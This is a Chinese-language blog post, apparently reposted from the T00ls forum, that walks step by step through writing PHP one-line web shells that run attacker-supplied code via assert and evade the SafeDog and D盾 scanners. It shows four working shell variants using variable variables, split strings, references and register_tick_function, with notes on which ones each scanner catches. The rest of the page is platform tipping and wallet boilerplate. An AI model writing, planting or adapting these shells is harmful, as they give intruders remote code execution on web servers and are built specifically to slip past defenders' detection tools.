php一句话木马的老生常谈,可过D盾,安全狗

首发T00ls,原文地址https://www.t00ls.net/thread-45367-1-1.html

这边也是才进t00ls,算是一个小小的分享吧。
首先是过安全狗,这里讲下怎么一步步过安全狗。
首先下面这个马很简单,只用了一个变量覆盖,所以,不出所料被杀了
        $b=$_POST['x'];
        $a='b';
        @assert($$a);
1.png 
马被杀了那肯定要想办法免杀,我们试试把assert分开呢?
        $b=$_POST['x'];
        $a='b';
        $c=’a’.’s’.’s’.’e’.’r’.’t’;
        @$c($$a);
2.png 
还是不行,,那我再想想其他办法,引用下?换个思路呀?
        $a='b';
        $b=&$d;
        $c='a'.'s'.'s'.'e'.'r'.'t';
        $d=$_POST['x'];
        $c($$a);
3.png 
可以了,,这边可以看到,其实安全狗多绕绕,他就晕掉了。不过这个D盾还是会报警。
下面就分享一个D盾不报警的吧。
<?php
$a=array("assert"=>"XC90");
$b=array_keys($a,'XC90');
declare(ticks=1);
register_tick_function($b[0], $_REQUEST['x']);
?>
4.png 

  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值